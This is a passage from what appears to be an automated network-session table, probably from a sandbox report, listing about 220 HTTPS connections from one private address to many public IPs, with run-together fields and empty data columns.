                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16620192.168.2.1346966171.231.99.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16621192.168.2.134427827.223.156.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16622192.168.2.1339850186.171.42.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16623192.168.2.1337570199.143.62.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16624192.168.2.134979857.231.185.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16625192.168.2.1333578175.136.237.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16626192.168.2.135731843.244.140.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16627192.168.2.1348932195.132.189.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16628192.168.2.135980019.254.180.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16629192.168.2.134377874.166.4.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16630192.168.2.1347096177.87.180.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16631192.168.2.1338156211.43.146.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16632192.168.2.134319472.176.240.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16633192.168.2.133414673.2.200.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16634192.168.2.134092843.45.17.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16635192.168.2.135748412.56.48.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16636192.168.2.1354346132.91.137.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16637192.168.2.13531481.44.115.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16638192.168.2.133974632.252.59.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16639192.168.2.1347520125.98.56.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16640192.168.2.1352616157.30.156.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16641192.168.2.1335340195.14.234.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16642192.168.2.134496482.248.174.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16643192.168.2.1340768207.209.57.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16644192.168.2.1349520120.164.190.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16645192.168.2.135388698.88.37.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16646192.168.2.134661296.132.201.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16647192.168.2.133802098.161.15.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16648192.168.2.1341290202.237.2.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16649192.168.2.1353958129.192.191.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16650192.168.2.1348856221.173.218.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16651192.168.2.1346264115.88.238.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16652192.168.2.135989689.251.41.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16653192.168.2.1358462203.237.50.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16654192.168.2.134820850.152.50.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16655192.168.2.1347978181.112.251.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16656192.168.2.135769642.155.230.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16657192.168.2.1359402139.70.83.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16658192.168.2.134271495.161.248.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16659192.168.2.1341326123.231.23.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16660192.168.2.135122077.135.27.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16661192.168.2.1351714181.75.89.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16662192.168.2.1332914210.126.226.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16663192.168.2.1341388164.240.133.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16664192.168.2.134087674.92.199.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16665192.168.2.1358954145.51.72.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16666192.168.2.1336318205.110.182.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16667192.168.2.1350524140.245.92.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16668192.168.2.1350146149.88.97.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16669192.168.2.1333392156.220.98.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16670192.168.2.13400409.88.183.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16671192.168.2.133293889.182.105.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16672192.168.2.13523601.232.113.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16673192.168.2.136019425.122.112.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16674192.168.2.133576272.11.229.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16675192.168.2.1336972170.138.202.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16676192.168.2.1343678167.116.99.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16677192.168.2.1343548177.6.108.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16678192.168.2.1357702219.194.43.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16679192.168.2.1358384159.32.188.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16680192.168.2.1348382178.174.7.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16681192.168.2.1353378123.146.191.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16682192.168.2.1354410155.246.104.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16683192.168.2.1350314171.119.51.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16684192.168.2.135279012.7.59.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16685192.168.2.1357174221.242.219.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16686192.168.2.1342322119.40.56.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16687192.168.2.1341886107.35.237.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16688192.168.2.1359042135.40.166.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16689192.168.2.134779296.169.191.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16690192.168.2.1340164129.18.170.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16691192.168.2.1342376176.169.242.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16692192.168.2.133896468.135.121.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16693192.168.2.1339314156.232.178.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16694192.168.2.1346202138.162.18.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16695192.168.2.1343516181.204.177.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16696192.168.2.1356018163.254.30.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16697192.168.2.1348638201.0.67.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16698192.168.2.1347554121.215.45.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16699192.168.2.1339718218.13.26.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16700192.168.2.1359156109.131.170.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16701192.168.2.1345376200.128.116.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16702192.168.2.134228260.52.216.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16703192.168.2.1335222129.177.173.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16704192.168.2.135167088.90.102.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16705192.168.2.1339980112.133.85.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16706192.168.2.133967619.96.108.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16707192.168.2.1342292117.130.111.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16708192.168.2.1347818145.45.118.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16709192.168.2.1353414183.158.79.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16710192.168.2.135903040.235.206.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16711192.168.2.1348952206.70.13.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16712192.168.2.1339376192.188.208.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16713192.168.2.134512234.19.124.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16714192.168.2.134039662.223.147.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16715192.168.2.1357596138.186.75.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16716192.168.2.1340748130.165.137.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16717192.168.2.134836843.49.45.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16718192.168.2.1347704202.13.31.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16719192.168.2.135078480.18.237.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16720192.168.2.1338632168.20.238.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16721192.168.2.1349540210.54.208.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16722192.168.2.1358116208.54.172.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16723192.168.2.1346418134.54.204.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16724192.168.2.135946666.250.235.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16725192.168.2.1346796205.170.207.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16726192.168.2.1336776125.173.191.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16727192.168.2.1339308110.27.20.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16728192.168.2.1339982168.47.178.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16729192.168.2.133458690.149.179.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16730192.168.2.1344462205.148.250.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16731192.168.2.133712649.45.192.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16732192.168.2.1354828210.84.205.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16733192.168.2.134263278.25.227.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16734192.168.2.134702093.91.110.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16735192.168.2.13475861.145.34.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16736192.168.2.1338270220.21.218.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16737192.168.2.1339706140.192.7.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16738192.168.2.1351900167.38.250.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16739192.168.2.1357946221.99.55.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16740192.168.2.1350936138.157.27.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16741192.168.2.133963083.31.176.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16742192.168.2.1337804187.172.200.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16743192.168.2.1349572175.93.252.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16744192.168.2.1334500132.160.147.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16745192.168.2.1336764209.71.21.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16746192.168.2.135585896.102.99.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16747192.168.2.1334056169.5.232.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16748192.168.2.1337876145.112.200.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16749192.168.2.1357194162.72.242.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16750192.168.2.134405258.237.214.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16751192.168.2.1359946100.185.188.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16752192.168.2.1352710139.84.253.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16753192.168.2.133792474.40.188.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16754192.168.2.134248671.143.205.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16755192.168.2.1340676124.217.45.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16756192.168.2.1355598121.158.245.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16757192.168.2.1336758198.206.56.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16758192.168.2.134684887.223.128.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16759192.168.2.1340632114.175.36.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16760192.168.2.133394013.30.155.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16761192.168.2.134307678.40.9.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16762192.168.2.1354870119.40.142.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16763192.168.2.134431497.146.22.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16764192.168.2.1341632146.12.35.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16765192.168.2.134946872.46.165.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16766192.168.2.1345984204.134.200.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16767192.168.2.1340332194.135.40.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16768192.168.2.134589243.65.1.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16769192.168.2.1356456139.93.12.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16770192.168.2.133379820.210.40.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16771192.168.2.1359236112.30.150.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16772192.168.2.1336946139.212.179.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16773192.168.2.1341228123.4.105.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16774192.168.2.1345870130.122.6.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16775192.168.2.1349090188.152.96.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16776192.168.2.1337246213.56.92.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16777192.168.2.133442846.184.144.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16778192.168.2.1356512185.11.127.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16779192.168.2.134711880.177.215.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16780192.168.2.1338076175.234.139.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16781192.168.2.135865617.151.134.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16782192.168.2.1344960167.117.67.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16783192.168.2.1344632136.252.152.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16784192.168.2.133323092.218.241.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16785192.168.2.1335254205.164.96.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16786192.168.2.1347420144.92.49.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16787192.168.2.1343886223.33.252.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16788192.168.2.134549660.21.26.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16789192.168.2.133615617.45.171.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16790192.168.2.133708644.109.166.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16791192.168.2.135753877.63.88.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16792192.168.2.1351512190.99.85.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16793192.168.2.1354566220.12.162.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16794192.168.2.135919471.26.104.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16795192.168.2.135274439.201.213.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16796192.168.2.1342338157.192.193.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16797192.168.2.134254869.65.143.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16798192.168.2.1352760113.157.246.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16799192.168.2.133322639.246.184.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16800192.168.2.134008866.72.206.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16801192.168.2.1333044196.45.50.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16802192.168.2.136017665.94.74.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16803192.168.2.1353896165.145.126.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16804192.168.2.1346182122.243.142.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16805192.168.2.1343020216.167.108.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16806192.168.2.1352756210.209.116.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16807192.168.2.133661857.12.163.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16808192.168.2.1344654134.242.148.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16809192.168.2.1352004121.255.20.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16810192.168.2.13424284.197.238.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16811192.168.2.1352446202.71.197.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16812192.168.2.1353974108.200.95.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16813192.168.2.1336760126.51.121.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16814192.168.2.1335328134.96.68.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16815192.168.2.134759037.3.207.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16816192.168.2.135202412.132.58.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16817192.168.2.134000047.144.24.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16818192.168.2.1347072133.202.90.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16819192.168.2.133698054.215.133.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16820192.168.2.135879262.5.196.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16821192.168.2.13465381.121.67.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16822192.168.2.1356990129.84.166.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16823192.168.2.1351376202.240.124.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16824192.168.2.1344912116.214.177.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16825192.168.2.1348736182.234.90.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16826192.168.2.134695894.120.144.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16827192.168.2.1339948185.51.133.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16828192.168.2.13350101.192.236.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16829192.168.2.1334242202.10.117.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16830192.168.2.1351000165.155.13.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16831192.168.2.1358002218.108.184.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16832192.168.2.135448471.239.170.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16833192.168.2.1337918126.14.243.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16834192.168.2.1338826117.211.15.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16835192.168.2.1335150177.225.211.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16836192.168.2.1343188107.191.4.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16837192.168.2.1337718218.190.95.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16838192.168.2.1358084169.1.225.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16839192.168.2.1343016156.94.243.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16840192.168.2.133886064.33.111.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16841192.168.2.133971648.187.133.31443
